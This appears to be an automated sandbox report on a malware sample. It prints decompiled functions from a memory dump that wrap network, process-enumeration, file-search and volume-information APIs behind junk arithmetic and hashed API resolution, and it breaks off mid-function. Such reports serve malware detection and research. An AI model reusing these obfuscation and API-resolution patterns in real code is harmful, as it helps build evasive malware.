API String ID: 1974802433-402333656
Opcode ID: 36fdb602463615d85640dee2202416375b56d64be84a9f72e6469216861f4ee0
Instruction ID: beb83cb881171c601f5e089a7185470e1e6b3245923dfbc384932eed41f74e6d
Opcode Fuzzy Hash: 36fdb602463615d85640dee2202416375b56d64be84a9f72e6469216861f4ee0
Instruction Fuzzy Hash: 1F214375D00209EBEB18CFA9DC4A9DEBFB4FB84300F008188E811B6260D3B59B54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EC1027, Relevance: 1.6, APIs: 1, Instructions: 57
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00EC1027(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, intOrPtr _a16, intOrPtr _a20, DWORD* _a24) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t46;
				int _t55;
				signed int _t57;
				void* _t62;

				_push(_a24);
				_t62 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00EC2523(_t46);
				_v12 = 0xd4e775;
				_v12 = _v12 ^ 0x9fa1d679;
				_v12 = _v12 + 0xffffd43b;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x000b9d33;
				_v20 = 0xb1fd06;
				_v20 = _v20 + 0xffff1766;
				_v20 = _v20 ^ 0x00bd550d;
				_v16 = 0x2d7499;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x749af706;
				_v8 = 0x5dfa4b;
				_t57 = 0x11;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 | 0xef9b7d02;
				_v8 = _v8 ^ 0xef9457ed;
				E00EA2309(0x254, _t57, _t57, 0xf677e454, _t57, 0xc0cf1a4);
				_t55 = InternetReadFile(_t62, _a8, _a12, _a24); // executed
				return _t55;
			}

0x00ec102e
0x00ec1031
0x00ec1033
0x00ec1036
0x00ec1039
0x00ec103c
0x00ec103f
0x00ec1043
0x00ec1044
0x00ec1049
0x00ec1053
0x00ec105c
0x00ec1063
0x00ec1067
0x00ec106e
0x00ec1075
0x00ec107c
0x00ec1083
0x00ec108a
0x00ec108e
0x00ec1095
0x00ec10a1
0x00ec10a9
0x00ec10ac
0x00ec10b0
0x00ec10b7
0x00ec10d7
0x00ec10e9
0x00ec10ef

APIs

InternetReadFile.WININET(?,749AF706,00BD550D,?), ref: 00EC10E9

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 2d4f4d84a63d0f13ac273aada7b35ede13ebed0102486743890e3910fc006acb
Instruction ID: 8b2acb841f04dfb8e7a3796be81f48f4e6944ab95f8a15d17899895f3e65d89c
Opcode Fuzzy Hash: 2d4f4d84a63d0f13ac273aada7b35ede13ebed0102486743890e3910fc006acb
Instruction Fuzzy Hash: A42113B6D00209BBDF06DFE4C94A8EEBBB1EF44300F108189F92566251E3B55B61EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EB1B54, Relevance: 1.5, APIs: 1, Instructions: 47
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB1B54(int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t51;
				signed int _t52;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x604094;
				_v32 = 0x94e455;
				_v28 = 0xad6ab3;
				_v8 = 0x1f2344;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 0xe;
				_t52 = 0x3c;
				_v8 = _v8 * 0x16;
				_v8 = _v8 ^ 0x0ab2d5aa;
				_v20 = 0xb8d8f1;
				_v20 = _v20 ^ 0x9bb5e2ea;
				_v20 = _v20 ^ 0x9b0a37ea;
				_v16 = 0x527695;
				_v16 = _v16 << 1;
				_v16 = _v16 / _t52;
				_v16 = _v16 ^ 0x000d80fe;
				_v12 = 0xedaf67;
				_v12 = _v12 ^ 0xb485e6d8;
				_v12 = _v12 + 0xffff9be0;
				_v12 = _v12 ^ 0xb46ea43d;
				E00EA2309(0x190, _t52, _t52, 0xbde7009f, _t52, 0x9c9047d0);
				_t51 = CreateToolhelp32Snapshot(_a4, 0); // executed
				return _t51;
			}

0x00eb1b5a
0x00eb1b60
0x00eb1b67
0x00eb1b6e
0x00eb1b75
0x00eb1b7c
0x00eb1b80
0x00eb1b8a
0x00eb1b91
0x00eb1b94
0x00eb1b9b
0x00eb1ba2
0x00eb1ba9
0x00eb1bb0
0x00eb1bb7
0x00eb1bc4
0x00eb1bc7
0x00eb1bce
0x00eb1bd5
0x00eb1bdc
0x00eb1be3
0x00eb1bfd
0x00eb1c0a
0x00eb1c0f

APIs

CreateToolhelp32Snapshot.KERNEL32(B46EA43D,00000000), ref: 00EB1C0A

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 8dbd4dee2a96a2a279b30488413906bed3e520bcc45b322a8894c97035d3b5c6
Instruction ID: 6ced5ce9c390a474782846ce52c1225396de2d408064a7d30474f6710c1b88d9
Opcode Fuzzy Hash: 8dbd4dee2a96a2a279b30488413906bed3e520bcc45b322a8894c97035d3b5c6
Instruction Fuzzy Hash: 6611F3B1D0520CEBDB18DFA8C94A5AEBBB0FF44304F108199E521BB2A0D7B56B08DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00EA54DA, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57
networkCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00EA54DA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t52;
				int _t63;
				signed int _t65;
				signed int _t66;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00EC2523(_t52);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x6eade3;
				_v20 = 0x70ee4c;
				_v20 = _v20 + 0xffffd19f;
				_v20 = _v20 ^ 0x007528c6;
				_v16 = 0x80bb49;
				_v16 = _v16 + 0xffff2cb2;
				_v16 = _v16 >> 4;
				_t65 = 0x3d;
				_v16 = _v16 / _t65;
				_v16 = _v16 ^ 0x000cd3d3;
				_v12 = 0x49bca9;
				_v12 = _v12 + 0x284b;
				_v12 = _v12 + 0x352d;
				_v12 = _v12 ^ 0x5aa1db04;
				_v12 = _v12 ^ 0x5aee1bd2;
				_v8 = 0xbb5f19;
				_v8 = _v8 << 9;
				_v8 = _v8 | 0x616a7bee;
				_t39 =  &_v8; // 0x616a7bee
				_t66 = 0x5f;
				_v8 =  *_t39 / _t66;
				_v8 = _v8 ^ 0x01468cd5;
				E00EA2309(_t66 + 0x22, _t66, _t66, 0x1d483158, _t66, 0xc0cf1a4);
				_t63 = InternetCloseHandle(_a12); // executed
				return _t63;
			}

0x00ea54e0
0x00ea54e3
0x00ea54e6
0x00ea54eb
0x00ea54f0
0x00ea54f7
0x00ea5500
0x00ea5507
0x00ea550e
0x00ea5515
0x00ea551c
0x00ea5523
0x00ea552c
0x00ea5531
0x00ea5536
0x00ea553d
0x00ea5544
0x00ea554b
0x00ea5552
0x00ea5559
0x00ea5560
0x00ea5567
0x00ea556b
0x00ea5572
0x00ea5575
0x00ea557d
0x00ea5580
0x00ea559e
0x00ea55a9
0x00ea55ae

APIs

InternetCloseHandle.WININET(007528C6), ref: 00EA55A9

Strings

-5, xrefs: 00EA554B
{ja, xrefs: 00EA5572
Lp, xrefs: 00EA5500

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: CloseHandleInternet
String ID: -5$Lp${ja
API String ID: 1081599783-1222928185
Opcode ID: 96c25ca98efac3a213f8ce2c5c378593396d62ac674d19cb573e17f5676fb90f
Instruction ID: 833f879d5dd80feda5c9becb37923e3993d01715f1e1b2004f638ca8b2ddf063
Opcode Fuzzy Hash: 96c25ca98efac3a213f8ce2c5c378593396d62ac674d19cb573e17f5676fb90f
Instruction Fuzzy Hash: A82107B5D0120DEBDF04DFE5C94A9AEBBB1FB10314F10819DE511A6251E3B55B14CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00EBF606, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00EBF606(void* __ecx, void* __edx, struct tagPROCESSENTRY32W* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t43;
				void* _t50;
				void* _t54;

				_push(_a8);
				_t54 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00EC2523(_t43);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0xf33a94;
				_v8 = 0x16e1c5;
				_v8 = _v8 << 0x10;
				_v8 = _v8 + 0xffff7501;
				_v8 = _v8 * 0x3d;
				_v8 = _v8 ^ 0xcbc2f299;
				_v20 = 0x18380a;
				_v20 = _v20 + 0x556a;
				_v20 = _v20 ^ 0x2e444359;
				_v20 = _v20 ^ 0x2e5734c8;
				_v16 = 0x1de0f;
				_v16 = _v16 + 0xffff3d0f;
				_v16 = _v16 ^ 0x5b4c4104;
				_v16 = _v16 ^ 0x5b45396c;
				_v12 = 0x8d2c67;
				_v12 = _v12 | 0x6bb36e73;
				_v12 = _v12 ^ 0x44de99d4;
				_v12 = _v12 ^ 0x2f6e43e4;
				_t50 = E00EA2309(0x343, __ecx, __ecx, 0x1a63a552, __ecx, 0x9c9047d0);
				Process32FirstW(_t54, _a4); // executed
				return _t50;
			}

0x00ebf60d
0x00ebf610
0x00ebf612
0x00ebf615
0x00ebf616
0x00ebf617
0x00ebf61c
0x00ebf623
0x00ebf627
0x00ebf62e
0x00ebf635
0x00ebf639
0x00ebf650
0x00ebf653
0x00ebf65a
0x00ebf661
0x00ebf668
0x00ebf66f
0x00ebf676
0x00ebf67d
0x00ebf684
0x00ebf68b
0x00ebf692
0x00ebf699
0x00ebf6a0
0x00ebf6a7
0x00ebf6c0
0x00ebf6cc
0x00ebf6d2

APIs

Process32FirstW.KERNEL32(00000000,2F6E43E4,?,?,?,?,?,?,?,?,00000000), ref: 00EBF6CC

Strings

l9E[, xrefs: 00EBF68B
YCD., xrefs: 00EBF668
Cn/, xrefs: 00EBF6A7

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: FirstProcess32
String ID: YCD.$l9E[$Cn/
API String ID: 2623510744-4191728293
Opcode ID: ba6908419aca7e40de5752100cf2159fdf1c013576c21fa5a45c6b552e88f8aa
Instruction ID: 67187316265048f59d4dbd8d86ab2c36e1b7f2ce68bb2950dc1497db7d558147
Opcode Fuzzy Hash: ba6908419aca7e40de5752100cf2159fdf1c013576c21fa5a45c6b552e88f8aa
Instruction Fuzzy Hash: 6D2153B6C01209EBCF08DFE8D94A9AEBBB4FF10715F108289E515B6210D3741B00DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00EBA809, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00EBA809(DWORD* __ecx, void* __edx, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t45;
				int _t55;
				DWORD* _t60;

				_t60 = __ecx;
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E00EC2523(_t45);
				_v36 = 0x72e62c;
				_v32 = 0x6afee3;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x241442;
				_v12 = _v12 ^ 0x5f0a7563;
				_v12 = _v12 * 0x4b;
				_v12 = _v12 + 0xffff00d5;
				_v12 = _v12 ^ 0xe298fffa;
				_v20 = 0x629ccf;
				_v20 = _v20 + 0xa262;
				_v20 = _v20 ^ 0x006504c5;
				_v8 = 0x8dfd52;
				_v8 = _v8 * 0x5f;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x1a5bea6c;
				_v16 = 0x13a484;
				_v16 = _v16 * 0x42;
				_v16 = _v16 ^ 0x051e7b21;
				E00EA2309(0x1c8, __ecx, __ecx, 0xfc0d3d9c, __ecx, 0x9c9047d0);
				_t55 = GetVolumeInformationW(_a16, 0, 0, _t60, 0, 0, 0, 0); // executed
				return _t55;
			}

0x00eba813
0x00eba815
0x00eba816
0x00eba817
0x00eba81a
0x00eba81d
0x00eba81e
0x00eba81f
0x00eba822
0x00eba825
0x00eba828
0x00eba82b
0x00eba82e
0x00eba82f
0x00eba831
0x00eba832
0x00eba837
0x00eba841
0x00eba848
0x00eba84b
0x00eba84e
0x00eba855
0x00eba86c
0x00eba86f
0x00eba876
0x00eba87d
0x00eba884
0x00eba88b
0x00eba892
0x00eba8a3
0x00eba8a6
0x00eba8aa
0x00eba8ae
0x00eba8b5
0x00eba8c0
0x00eba8c3
0x00eba8d6
0x00eba8e8
0x00eba8ef

APIs

GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00EBA8E8

Strings

,r, xrefs: 00EBA837
cu_, xrefs: 00EBA855

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: InformationVolume
String ID: ,r$cu_
API String ID: 2039140958-355032270
Opcode ID: 11f0a768391377fe69868ce35b1527178b61e9fcd2d284546a7f3ae16540a2da
Instruction ID: 2b824098713514622c395f7834d8af305996e9cd33e0f5467507449b30e834d0
Opcode Fuzzy Hash: 11f0a768391377fe69868ce35b1527178b61e9fcd2d284546a7f3ae16540a2da
Instruction Fuzzy Hash: E521E0B1801249BBCF14CFA6DD49CDFBFB9EB86704F108099F910A6220D3B59A15DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EAFBFA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00EAFBFA(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t48;
				int _t57;
				signed int _t59;

				_push(_a8);
				_push(_a4);
				E00EC2523(_t48);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x49672e;
				_v32 = 0xb6dd69;
				_v16 = 0x714492;
				_v16 = _v16 >> 4;
				_v16 = _v16 + 0x8cae;
				_v16 = _v16 + 0xf12f;
				_v16 = _v16 ^ 0x0001c43a;
				_v20 = 0xe1aff5;
				_v20 = _v20 + 0x563d;
				_v20 = _v20 ^ 0x00ec4f92;
				_v12 = 0xff415;
				_v12 = _v12 + 0x39cf;
				_v12 = _v12 | 0x79f6ff5d;
				_v12 = _v12 ^ 0x79f7d296;
				_v8 = 0xdebe32;
				_t59 = 0x1e;
				_v8 = _v8 / _t59;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 ^ 0x0002d9b6;
				E00EA2309(0x336, _t59, _t59, 0xd09d8658, _t59, 0x9c9047d0);
				_t57 = FindClose(_a8); // executed
				return _t57;
			}

0x00eafc00
0x00eafc03
0x00eafc08
0x00eafc0d
0x00eafc14
0x00eafc1a
0x00eafc21
0x00eafc28
0x00eafc2f
0x00eafc33
0x00eafc3a
0x00eafc41
0x00eafc48
0x00eafc4f
0x00eafc56
0x00eafc5d
0x00eafc64
0x00eafc6b
0x00eafc72
0x00eafc79
0x00eafc85
0x00eafc8d
0x00eafc90
0x00eafc94
0x00eafc98
0x00eafcb8
0x00eafcc3
0x00eafcc8

APIs

FindClose.KERNEL32(0001C43A), ref: 00EAFCC3

Strings

=V, xrefs: 00EAFC4F
.gI, xrefs: 00EAFC1A

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: CloseFind
String ID: .gI$=V
API String ID: 1863332320-2530093900
Opcode ID: 110af252eeec9babbf3e3997d431909c73a56f909e67471b0c3fb51db6a30985
Instruction ID: 9a35a812c0573e266193a868397480d451f818cdad6e7ab8f2f059652dff0810
Opcode Fuzzy Hash: 110af252eeec9babbf3e3997d431909c73a56f909e67471b0c3fb51db6a30985
Instruction Fuzzy Hash: 282133B1D0020CEFEB04DFD5C94AAEEBBB0FB54318F10C099E62466240E3B95B589F90

Uniqueness

Uniqueness Score: -1.00%

Function 00EBE9E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
fileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00EBE9E8(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t39;
				int _t47;
				void* _t51;

				_push(_a16);
				_t51 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00EC2523(_t39);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x7dd1c2;
				_v20 = 0xe6ed41;
				_v20 = _v20 ^ 0x6eedbecd;
				_v20 = _v20 * 0x45;
				_v20 = _v20 ^ 0xa90eba26;
				_v16 = 0x25fde1;
				_v16 = _v16 + 0xffffc5d1;
				_v16 = _v16 | 0x325ad611;
				_v16 = _v16 ^ 0x3277e624;
				_v8 = 0x448e1b;
				_v8 = _v8 | 0xd7f3ffef;
				_v8 = _v8 ^ 0xcff08007;
				_v8 = _v8 ^ 0x180d74c6;
				_v12 = 0x3a9cbc;
				_v12 = _v12 | 0xfe729dd7;
				_v12 = _v12 ^ 0xfe7a3202;
				E00EA2309(0x2de, __ecx, __ecx, 0xa7d3fbc8, __ecx, 0x9c9047d0);
				_t47 = FindNextFileW(_t51, _a4); // executed
				return _t47;
			}

0x00ebe9ef
0x00ebe9f2
0x00ebe9f4
0x00ebe9f7
0x00ebe9fa
0x00ebe9fe
0x00ebe9ff
0x00ebea04
0x00ebea0b
0x00ebea12
0x00ebea19
0x00ebea30
0x00ebea33
0x00ebea3a
0x00ebea41
0x00ebea48
0x00ebea4f
0x00ebea56
0x00ebea5d
0x00ebea64
0x00ebea6b
0x00ebea72
0x00ebea79
0x00ebea80
0x00ebea99
0x00ebeaa5
0x00ebeaab

APIs

FindNextFileW.KERNELBASE(00000000,FE7A3202,?,?,?,?,?,?,?,?,?,?,00000072), ref: 00EBEAA5

Strings

A, xrefs: 00EBEA12
$w2, xrefs: 00EBEA4F

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: FileFindNext
String ID: $w2$A
API String ID: 2029273394-2068021171
Opcode ID: 489ae82eb01001db2e27a8813198e8620566e78ec9ea4fd3dbf43d66dbc97652
Instruction ID: 1f7d1647473b6c7f7fc278df5574133db7d339894ba4653db102696b3adc0105
Opcode Fuzzy Hash: 489ae82eb01001db2e27a8813198e8620566e78ec9ea4fd3dbf43d66dbc97652
Instruction Fuzzy Hash: D3111FB1C0121DAFCF05DFE8DA068AEBFB4FB04300F108589E915B6260E3B55B249FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00EA8A5E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
networkCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00EA8A5E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a24, WCHAR* _a36, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, WCHAR* _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t45;
				void* _t52;
				void* _t57;

				_push(_a56);
				_t57 = __edx;
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00EC2523(_t45);
				_v32 = 0xd5d112;
				_v28 = 0x50513d;
				_v24 = 0;
				_v12 = 0x46c43;
				_v12 = _v12 + 0xffffdfef;
				_v12 = _v12 | 0x9d8b3e1d;
				_v12 = _v12 ^ 0x9d8347af;
				_v20 = 0x816eb9;
				_v20 = _v20 + 0xffff29e2;
				_v20 = _v20 ^ 0x0080c9d8;
				_v8 = 0x807982;
				_v8 = _v8 | 0x5015719e;
				_v8 = _v8 ^ 0xfbfa9e2f;
				_v8 = _v8 ^ 0xab6f9dce;
				_v16 = 0xec1576;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x000e8763;
				E00EA2309(0x18c, __ecx, __ecx, 0xb50c381d, __ecx, 0xc0cf1a4);
				_t52 = HttpOpenRequestW(_t57, _a36, _a56, 0, 0, 0, _a24, 0); // executed
				return _t52;
			}

0x00ea8a66
0x00ea8a6b
0x00ea8a6d
0x00ea8a70
0x00ea8a73
0x00ea8a76
0x00ea8a77
0x00ea8a7a
0x00ea8a7b
0x00ea8a7c
0x00ea8a7f
0x00ea8a80
0x00ea8a83
0x00ea8a86
0x00ea8a89
0x00ea8a8c
0x00ea8a8d
0x00ea8a8e
0x00ea8a93
0x00ea8a9d
0x00ea8aa4
0x00ea8aa7
0x00ea8aae
0x00ea8ab5
0x00ea8abc
0x00ea8ac3
0x00ea8aca
0x00ea8ad1
0x00ea8ad8
0x00ea8adf
0x00ea8ae6
0x00ea8aed
0x00ea8af4
0x00ea8afb
0x00ea8aff
0x00ea8b24
0x00ea8b3a
0x00ea8b41

APIs

HttpOpenRequestW.WININET(?,?,?,00000000,00000000,00000000,00D5D112,00000000), ref: 00EA8B3A

Strings

=QP, xrefs: 00EA8A9D

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: HttpOpenRequest
String ID: =QP
API String ID: 1984915467-456757808
Opcode ID: 4cc3d4786cdcc23149290c3469cd4bf7c683ba33055c948049ab044fbc38bf75
Instruction ID: 9ecd38f20c433bb66114c417b0993be2740fcfa71ceb129aaaec6b10183a1cdc
Opcode Fuzzy Hash: 4cc3d4786cdcc23149290c3469cd4bf7c683ba33055c948049ab044fbc38bf75
Instruction Fuzzy Hash: 7321F0B2801209BB8F559F95CD4ACDFBFB9EF85700F109148BA14A6220D3B18A65DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EB42E4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00EB42E4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t43;
				char _t54;
				signed int _t57;
				void* _t62;
				void* _t63;

				_push(_a20);
				_t62 = __edx;
				_push(_a16);
				_t63 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00EC2523(_t43);
				_v36 = 0xead706;
				_v32 = 0x8aaadf;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x3b6f9b;
				_t57 = 0x3f;
				_v12 = _v12 * 0xe;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x1a7fe3f0;
				_v20 = 0x6318b1;
				_v20 = _v20 | 0x2b2fc1f2;
				_v20 = _v20 ^ 0x2b6f417a;
				_v8 = 0xeb56a2;
				_v8 = _v8 << 1;
				_v8 = _v8 / _t57;
				_v8 = _v8 * 0x2f;
				_v8 = _v8 ^ 0x015d5ff9;
				_v16 = 0x2619ef;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0x098e35d6;
				E00EA2309(_t57 + 0x4d, _t57, _t57, 0x52f9059f, _t57, 0x9c9047d0);
				_t54 = RtlFreeHeap(_t62, 0, _t63); // executed
				return _t54;
			}

0x00eb42ed
0x00eb42f2
0x00eb42f4
0x00eb42f7
0x00eb42f9
0x00eb42fa
0x00eb42fd
0x00eb4300
0x00eb4301
0x00eb4302
0x00eb4307
0x00eb4311
0x00eb431a
0x00eb431d
0x00eb4320
0x00eb432d
0x00eb4334
0x00eb4337
0x00eb433b
0x00eb4342
0x00eb4349
0x00eb4350
0x00eb4357
0x00eb435e
0x00eb436b
0x00eb4377
0x00eb437a
0x00eb4381
0x00eb4388
0x00eb438c
0x00eb439f
0x00eb43aa
0x00eb43b2

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,072B1AC5,00000000,00000000), ref: 00EB43AA

Strings

zAo+, xrefs: 00EB4350

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: FreeHeap
String ID: zAo+
API String ID: 3298025750-440923707
Opcode ID: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction ID: b7e0a08257484734e7b4c01c4991c57ac9310254552891a3bbc459640dc0e926
Opcode Fuzzy Hash: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction Fuzzy Hash: 142148B1C00208BF9B08DF99D98A8EFBFB8FB49344F508199E515BB240D3B05B149B90

Uniqueness

Uniqueness Score: -1.00%

Function 00EAF2CC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
networkCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E00EAF2CC(void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				void* __ecx;
				void* _t36;
				void* _t44;
				void* _t46;

				_push(_a32);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00EC2523(_t36);
				_v28 = 0x481ca4;
				_v24 = 0;
				_v20 = 0xca1952;
				_v20 = _v20 ^ 0x1684c8f8;
				_v20 = _v20 ^ 0x16482d99;
				_v12 = 0xc193bc;
				_v12 = _v12 ^ 0x27e4a297;
				_v12 = _v12 | 0xa7673761;
				_v12 = _v12 ^ 0xa76f04da;
				_v8 = 0xc5b902;
				_push(0xc0cf1a4);
				_push(_t45);
				_push(0xb325898b);
				_push(_t45);
				_v8 = _v8 * 0x4e;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x03c56f69;
				_v16 = 0x24ec4f;
				_v16 = _v16 + 0xffffc13d;
				_v16 = _v16 ^ 0x002fbbc3;
				_push(_t45);
				_t46 = 0x50;
				E00EA2309(_t46);
				_t44 = InternetOpenW(0, _a12, 0, 0, 0); // executed
				return _t44;
			}

0x00eaf2d3
0x00eaf2d8
0x00eaf2d9
0x00eaf2da
0x00eaf2db
0x00eaf2dc
0x00eaf2df
0x00eaf2e2
0x00eaf2e7
0x00eaf2ec
0x00eaf2f6
0x00eaf2f9
0x00eaf300
0x00eaf307
0x00eaf30e
0x00eaf315
0x00eaf31c
0x00eaf323
0x00eaf32a
0x00eaf335
0x00eaf33a
0x00eaf33b
0x00eaf340
0x00eaf341
0x00eaf344
0x00eaf348
0x00eaf34f
0x00eaf356
0x00eaf35d
0x00eaf370
0x00eaf373
0x00eaf374
0x00eaf383
0x00eaf389

APIs

InternetOpenW.WININET(00000000,16482D99,00000000,00000000,00000000), ref: 00EAF383

Strings

O$, xrefs: 00EAF34F

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: InternetOpen
String ID: O$
API String ID: 2038078732-838329570
Opcode ID: bfd598ea9fc20005dd18c51756325e876dca57c81b5a8b40325e3a3f8c113345
Instruction ID: 8c5020e0f6021bb617975500ac1c09d0cdf13dfd7641622134906c65bddec6ae
Opcode Fuzzy Hash: bfd598ea9fc20005dd18c51756325e876dca57c81b5a8b40325e3a3f8c113345
Instruction Fuzzy Hash: 981113B1C0121DBB8B15DFA58D4A8DFBFB8EF05754F108589F914B6110C3B15A54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EBA4A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E00EBA4A0(void* __ecx, void* __edx, intOrPtr _a4, struct tagPROCESSENTRY32W _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
